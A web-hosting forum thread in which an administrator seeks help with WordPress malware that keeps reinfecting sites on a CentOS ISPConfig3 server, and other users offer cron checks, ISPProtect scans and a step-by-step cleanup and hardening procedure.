I'm facing an unusual situation for the last 3 months, to which I have reached the limits with Wordpress support, so I'm considering looking at the OS which may have scripts running to maintain this virus. All my Wordpress sites on my ISPConfig3 server is automatically getting a plugin installed. This virus is creating users within the wordpress, its creating plugin folders in the database, its changing admin email addresses and passwords, as well as adding more admins when i install plugins such as wordfence, the virus will actually inactivate and delete the plugin when changing the password to something I know via the DB, whilst logged into wordpress, the virus will rechange the email address, password and log me out of the admin dashboard. After some time, the virus will disable the front page of the website and also damage the database. I looked thought many wordpress forums and asked many wordpress users, no one knows about this virus, so I'm thinking its a script within my OS... anyway to help me resolve this? I attach some screenshots.
Have you tried ISPProtect? https://www.ispconfig.org/add-ons/ If you think the UmMA*.php file is the virus file, does it come back after you delete it? Are there strange cron jobs on that host? Code: ls -lh /var/spool/cron/crontabs/ Did WordFence support help in cleaning up the site?
1- I havent tried ISPProtect, didnt know about it, will look into it now. 2- The file does come back renamed as another file. The contents are same. 3- I will check cron jobs and report back. 4- It doesnt allow me to access wordfence. When i install worfence and then try to access the plugin to scan, it immediately changes the password to loge me out, and deletes wordfence.
does ISPProtect have a GUI interface via the ISPConfig3 portal/dashboard? I think the TRIAL is very limited, see below ionCube Check succeeded. Please enter scan key (or TRIAL if you have none, yet): TRIAL Please enter path to scan: /var/www Could not run scan with key TRIAL because of error: TRIAL_LIMIT_REACHED
No The trial has the same functions that the full version has, but you are allowed to use it only once on your server. This means you must have used the tool already. The trial allows you to use it one time.
Which two? What shows Code: ls -lh /var/spool/cron/crontabs/ Do this: https://forum.howtoforge.com/threads/please-read-before-posting.58408/ so we know what OS host is running and other context.
Alright. I cant ever remember using the program as I only learn about it now...but its a long running server, it may have gone through it via another support tech. Anyway, whats next step forward then? I see we buy 5 scans usable in a year? So its pay per use?
I've sent you a PM. There are per-use licenses like the 5, 10, or 25 scan licenses, they have no time or server limit. And there is the yearly license, which is valid for one server for one year with unlimited amount of scans on that server.
I AM NOW DESPERATE Honestly, i have tried everything i can think of. i deleted the all files under /web i installed fresh wordpress files i ensured i didnt use any old files this is a fresh wordpress site and the malware hits it again! Malware does this: 1- changes wordpress admin user password and email address 2- adds plugins with weird directory names 3- If wordfence plugin is installed, IT DELETES the wordfence plugin! there's nothing online pointing to this malware i have bought ISP Protect licences and ran the scan 3 times. It quarantined some of the files and some not. The malware is on many of my wordpress sites it doesnt seem to have infected the sites without wordpress I am sooooo down, i just dont know what to do!
Fighting and removing malware is not always easy. Most likely the malware installed cronjobs which it uses to reinfect the websites. Check with: crontab -l -u web1 where web1 is the user of the infected site. if you see a cronjob there, remove it by editing the user crontab with: crontab -e -u web1 And/or contact @Th0m from ISPConfig business support if he is able to assist you.
you can't just replace the wordpress files and assume the site is now clean. yes, you do want to backup and wipe out whats in /web (don't forget the hidden files), also backup the database. now change any ftp passwords, change the mysql login and password for that sites database access, and as already suggested, check for any cron jobs, remove any that shouldn't be there. now go through the entire database, first remove any spurious wordress accounts. change all admin account passwords. check for anything embedded in there, usually added to content in posts or pages, again often base64 encoded. remove all spurious content. re-download the latest wordpress, the theme, and any used plugins, directly from trusted sources. before you restore the contents of the uploads folder, you'll want to check each and every file in there. many php scripts are masquerading as ordinary image files. ideally use .htaccess files to block the uploading of php files to uploads, and the execution of any and all files under uploads. now you can begin to assume that the wordpress site is reasonably clean. yes, it can be a long and tedious process. and this is just to get a site back up and running, none of this bit even involves trying to work out how the buggers got into the server/site in the first place.
And one thing that might help you temporarily is to disable the suexec checkbox in the website, this will make PHP scripts run as www-data user instead of the web user, this is generally less secure and wp won't work as a cms anymore. You won't be able to upload files in WP anymore and you also won't be able to update WordPress, install plugins or edit files via WordPress. But the attacker will not be able to do that as well, so this can give you some time to investigate things after cleaning up wp without getting reinfection. This is just temporary during the cleanup and malware removal process, but it can be a useful step.
noted, will try as suggested. I have a strong suspicion that the malware is in the database... any scanner which can scan DB's or what can i look out for?
You wrote previously the malware is on other Wordpress sites also. So, are they all owned by the user web4? You should check all crontabs, like I suggested in #2 and #7. Did you ever say what OS is on that host?
The fact that multiple wp sites are affected can help to narrow down the way the sites got infected (in case they are not owned by the same client of course) by looking at which similarities the sites have in installed plugins and themes.
Yes, the malware is on other wordpress sites as well No they are not all owned by web4 but owned by their own webX Herewith active crontabs, i disabled some to test. the active ones , i dont know whats 0anacron and raid-check, but when i googled it, it didnt show anything malware/virus related, so i enabled them again. I enabled the ispconfig ones, and I dont know whats running run-getmail.sh, but i'm assuming its the system cron... [root@server1 web]# cat /etc/centos-release CentOS Linux release 8.5.2111
web4 web6 web16 web1 the above have the malware i have another 4 or 5 sites which either do not use wordpress, or are not as active so no plugins were installed, they are clean.